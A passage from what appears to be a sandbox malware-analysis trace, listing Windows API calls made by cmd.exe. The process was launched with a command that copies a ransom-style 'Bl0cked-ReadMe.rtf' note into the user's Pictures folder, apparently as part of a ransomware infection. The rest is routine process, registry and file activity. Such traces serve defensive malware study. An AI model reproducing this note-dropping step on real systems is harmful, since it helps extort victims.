entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 16092 start_va = 0x4f0000 end_va = 0x652fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 16093 start_va = 0x690000 end_va = 0x128ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Thread: id = 237 os_tid = 0xf94 [0141.724] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf91c | out: lpSystemTimeAsFileTime=0x2cf91c*(dwLowDateTime=0x8e68e220, dwHighDateTime=0x1d440a9)) [0141.724] GetCurrentProcessId () returned 0xfa0 [0141.724] GetCurrentThreadId () returned 0xf94 [0141.724] GetTickCount () returned 0x2c689 [0141.724] QueryPerformanceCounter (in: lpPerformanceCount=0x2cf914 | out: lpPerformanceCount=0x2cf914*=19851315308) returned 1 [0141.724] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0141.724] __set_app_type (_Type=0x1) [0141.725] __p__fmode () returned 0x76b331f4 [0141.725] __p__commode () returned 0x76b331fc [0141.725] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0141.725] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0141.725] GetCurrentThreadId () returned 0xf94 [0141.725] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf94) returned 0x38 [0141.725] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.725] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0141.725] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.725] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0141.725] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cf8ac | out: phkResult=0x2cf8ac*=0x0) returned 0x2 [0141.725] VirtualQuery (in: lpAddress=0x2cf8e3, lpBuffer=0x2cf87c, dwLength=0x1c | out: lpBuffer=0x2cf87c*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.725] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cf87c, dwLength=0x1c | out: lpBuffer=0x2cf87c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0141.725] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cf87c, dwLength=0x1c | out: lpBuffer=0x2cf87c*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0141.725] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cf87c, dwLength=0x1c | out: lpBuffer=0x2cf87c*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.725] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cf87c, dwLength=0x1c | out: lpBuffer=0x2cf87c*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0141.726] GetConsoleOutputCP () returned 0x1b5 [0141.726] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.726] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0141.726] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.726] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0141.726] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.726] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0141.726] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.726] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0141.726] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.726] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0141.727] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.727] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0141.727] GetEnvironmentStringsW () returned 0x400168* [0141.727] FreeEnvironmentStringsW (penv=0x400168) returned 1 [0141.727] GetEnvironmentStringsW () returned 0x400168* [0141.727] FreeEnvironmentStringsW (penv=0x400168) returned 1 [0141.727] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce81c | out: phkResult=0x2ce81c*=0x40) returned 0x0 [0141.727] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce824, lpData=0x2ce828, lpcbData=0x2ce820*=0x1000 | out: lpType=0x2ce824*=0x0, lpData=0x2ce828*=0x90, lpcbData=0x2ce820*=0x1000) returned 0x2 [0141.727] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce824, lpData=0x2ce828, lpcbData=0x2ce820*=0x1000 | out: lpType=0x2ce824*=0x4, lpData=0x2ce828*=0x1, lpcbData=0x2ce820*=0x4) returned 0x0 [0141.727] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce824, lpData=0x2ce828, lpcbData=0x2ce820*=0x1000 | out: lpType=0x2ce824*=0x0, lpData=0x2ce828*=0x1, lpcbData=0x2ce820*=0x1000) returned 0x2 [0141.727] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce824, lpData=0x2ce828, lpcbData=0x2ce820*=0x1000 | out: lpType=0x2ce824*=0x4, lpData=0x2ce828*=0x0, lpcbData=0x2ce820*=0x4) returned 0x0 [0141.727] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce824, lpData=0x2ce828, lpcbData=0x2ce820*=0x1000 | out: lpType=0x2ce824*=0x4, lpData=0x2ce828*=0x40, lpcbData=0x2ce820*=0x4) returned 0x0 [0141.727] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce824, lpData=0x2ce828, lpcbData=0x2ce820*=0x1000 | out: lpType=0x2ce824*=0x4, lpData=0x2ce828*=0x40, lpcbData=0x2ce820*=0x4) returned 0x0 [0141.727] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce824, lpData=0x2ce828, lpcbData=0x2ce820*=0x1000 | out: lpType=0x2ce824*=0x0, lpData=0x2ce828*=0x40, lpcbData=0x2ce820*=0x1000) returned 0x2 [0141.727] RegCloseKey (hKey=0x40) returned 0x0 [0141.727] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce81c | out: phkResult=0x2ce81c*=0x40) returned 0x0 [0141.727] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce824, lpData=0x2ce828, lpcbData=0x2ce820*=0x1000 | out: lpType=0x2ce824*=0x0, lpData=0x2ce828*=0x40, lpcbData=0x2ce820*=0x1000) returned 0x2 [0141.727] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce824, lpData=0x2ce828, lpcbData=0x2ce820*=0x1000 | out: lpType=0x2ce824*=0x4, lpData=0x2ce828*=0x1, lpcbData=0x2ce820*=0x4) returned 0x0 [0141.728] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce824, lpData=0x2ce828, lpcbData=0x2ce820*=0x1000 | out: lpType=0x2ce824*=0x0, lpData=0x2ce828*=0x1, lpcbData=0x2ce820*=0x1000) returned 0x2 [0141.728] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce824, lpData=0x2ce828, lpcbData=0x2ce820*=0x1000 | out: lpType=0x2ce824*=0x4, lpData=0x2ce828*=0x0, lpcbData=0x2ce820*=0x4) returned 0x0 [0141.728] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce824, lpData=0x2ce828, lpcbData=0x2ce820*=0x1000 | out: lpType=0x2ce824*=0x4, lpData=0x2ce828*=0x9, lpcbData=0x2ce820*=0x4) returned 0x0 [0141.728] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce824, lpData=0x2ce828, lpcbData=0x2ce820*=0x1000 | out: lpType=0x2ce824*=0x4, lpData=0x2ce828*=0x9, lpcbData=0x2ce820*=0x4) returned 0x0 [0141.728] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce824, lpData=0x2ce828, lpcbData=0x2ce820*=0x1000 | out: lpType=0x2ce824*=0x0, lpData=0x2ce828*=0x9, lpcbData=0x2ce820*=0x1000) returned 0x2 [0141.728] RegCloseKey (hKey=0x40) returned 0x0 [0141.728] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886370 [0141.728] srand (_Seed=0x5b886370) [0141.728] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf\"" [0141.728] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf\"" [0141.728] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.728] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4018c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0141.728] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0141.728] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0141.728] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.728] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0141.728] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0141.728] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0141.729] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0141.729] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0141.729] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0141.729] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0141.729] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0141.729] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0141.729] GetEnvironmentStringsW () returned 0x4022b8* [0141.729] FreeEnvironmentStringsW (penv=0x4022b8) returned 1 [0141.729] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.729] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.729] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0141.729] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0141.729] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0141.729] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0141.729] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0141.729] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0141.729] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0141.729] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0141.729] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf5e8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.729] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf5e8, lpFilePart=0x2cf5e4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf5e4*="Desktop") returned 0x18 [0141.729] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.729] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf364 | out: lpFindFileData=0x2cf364) returned 0x3ffff8 [0141.729] FindClose (in: hFindFile=0x3ffff8 | out: hFindFile=0x3ffff8) returned 1 [0141.730] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf364 | out: lpFindFileData=0x2cf364) returned 0x3ffff8 [0141.730] FindClose (in: hFindFile=0x3ffff8 | out: hFindFile=0x3ffff8) returned 1 [0141.730] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf364 | out: lpFindFileData=0x2cf364) returned 0x3ffff8 [0141.730] FindClose (in: hFindFile=0x3ffff8 | out: hFindFile=0x3ffff8) returned 1 [0141.730] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.730] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0141.730] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0141.730] GetEnvironmentStringsW () returned 0x402ad8* [0141.730] FreeEnvironmentStringsW (penv=0x402ad8) returned 1 [0141.730] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.731] GetConsoleOutputCP () returned 0x1b5 [0141.731] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.731] GetUserDefaultLCID () returned 0x409 [0141.731] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0141.731] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf728, cchData=128 | out: lpLCData="0") returned 2 [0141.731] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf728, cchData=128 | out: lpLCData="0") returned 2 [0141.731] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf728, cchData=128 | out: lpLCData="1") returned 2 [0141.731] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0141.731] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0141.731] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0141.731] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0141.731] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0141.731] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0141.731] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0141.731] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0141.731] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0141.731] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0141.732] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0141.732] GetConsoleTitleW (in: lpConsoleTitle=0x3f08d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.732] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.732] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0141.733] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0141.733] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0141.733] _wcsicmp (_String1="type", _String2=")") returned 75 [0141.733] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0141.733] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0141.733] _wcsicmp (_String1="IF", _String2="type") returned -11 [0141.733] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0141.733] _wcsicmp (_String1="REM", _String2="type") returned -2 [0141.733] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0141.737] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.737] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.737] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.737] GetFileType (hFile=0x7) returned 0x2 [0141.737] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0141.737] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf620 | out: lpMode=0x2cf620) returned 1 [0141.737] _dup (_FileHandle=1) returned 3 [0141.737] _close (_FileHandle=1) returned 0 [0141.737] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0141.737] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\pictures\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2cf5f0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0141.739] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0141.739] GetConsoleTitleW (in: lpConsoleTitle=0x2cf420, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.739] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0141.739] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0141.739] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0141.739] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0141.739] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.740] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2cef84, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cef84) returned 0x3f0e50 [0141.740] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0141.740] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0141.740] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0141.740] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2cde90, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0141.740] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0141.740] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.740] GetFileType (hFile=0x54) returned 0x1 [0141.740] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.740] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2cdee8 | out: lpFileSizeHigh=0x2cdee8*=0x0) returned 0x1632 [0141.740] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.740] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.740] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.740] ReadFile (in: hFile=0x54, lpBuffer=0x2ced20, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf10, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesRead=0x2cdf10*=0x200, lpOverlapped=0x0) returned 1 [0141.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.741] GetFileType (hFile=0x4c) returned 0x1 [0141.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.741] GetFileType (hFile=0x4c) returned 0x1 [0141.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.741] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.742] GetFileType (hFile=0x4c) returned 0x1 [0141.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.742] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced70*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.742] GetFileType (hFile=0x4c) returned 0x1 [0141.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.742] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cedc0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.742] GetFileType (hFile=0x4c) returned 0x1 [0141.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.742] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee10*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.742] GetFileType (hFile=0x4c) returned 0x1 [0141.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.742] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee60*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.742] GetFileType (hFile=0x4c) returned 0x1 [0141.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.742] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ceeb0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.742] GetFileType (hFile=0x4c) returned 0x1 [0141.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.742] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef00*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cef00*, lpNumberOfBytesWritten=0x2cdf04*=0x20, lpOverlapped=0x0) returned 1 [0141.742] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.742] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdef0 | out: lpNewFilePointer=0x0) returned 1 [0141.742] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.742] ReadFile (in: hFile=0x54, lpBuffer=0x2ced20, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf10, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesRead=0x2cdf10*=0x200, lpOverlapped=0x0) returned 1 [0141.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.743] GetFileType (hFile=0x4c) returned 0x1 [0141.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.743] GetFileType (hFile=0x4c) returned 0x1 [0141.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.743] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.743] GetFileType (hFile=0x4c) returned 0x1 [0141.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.743] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced70*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.743] GetFileType (hFile=0x4c) returned 0x1 [0141.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.743] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cedc0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.743] GetFileType (hFile=0x4c) returned 0x1 [0141.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.743] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee10*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.743] GetFileType (hFile=0x4c) returned 0x1 [0141.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.743] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee60*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.743] GetFileType (hFile=0x4c) returned 0x1 [0141.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.743] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceeb0*, nNumberOfBytesToWrite=0x50, 